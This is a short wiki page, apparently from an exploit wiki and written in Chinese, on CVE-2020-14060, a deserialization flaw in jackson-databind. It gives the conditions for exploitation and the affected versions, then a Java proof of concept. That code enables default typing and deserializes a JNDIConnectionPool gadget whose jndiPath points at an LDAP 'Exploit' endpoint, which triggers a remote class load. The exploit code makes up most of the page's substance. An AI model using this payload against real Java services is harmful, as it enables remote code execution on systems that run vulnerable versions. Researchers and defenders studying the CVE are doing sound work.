CVE-2020-14060 FasterXML jackson-databind 反序列化漏洞

Other languages:

利用條件

開啟enableDefaultTyping()

使用了org.apache.drill.exec:drill-jdbc-all第三方依賴

影響版本

jackson-databind before 2.9.10.4
jackson-databind before 2.8.11.6
jackson-databind before 2.7.9.7

POC

package com.jacksonTest;

import com.fasterxml.jackson.databind.ObjectMapper;

import java.io.IOException;

public class Poc {
   public static void main(String[] args) throws Exception {
       ObjectMapper mapper = new ObjectMapper();
       mapper.enableDefaultTyping();
       String payload = "[\"oadd.org.apache.xalan.lib.sql.JNDIConnectionPool\",{\"jndiPath\":\"ldap://127.0.0.1:1099/Exploit\"}]";
       try {
           Object obj = mapper.readValue(payload, Object.class);
           mapper.writeValueAsString(obj);
       } catch (IOException e) {
           e.printStackTrace();
       }
   }
}

Anonymous

Search

CVE-2020-14060 FasterXML jackson-databind 反序列化漏洞

Namespaces

More

Page actions

利用條件

影響版本

POC

Navigation

Navigation

Community

PwnWiki.org

Wiki tools

Wiki tools

Anonymous

Search

CVE-2020-14060 FasterXML jackson-databind 反序列化漏洞

利用條件

影響版本

POC

Navigation

Wiki tools

Page tools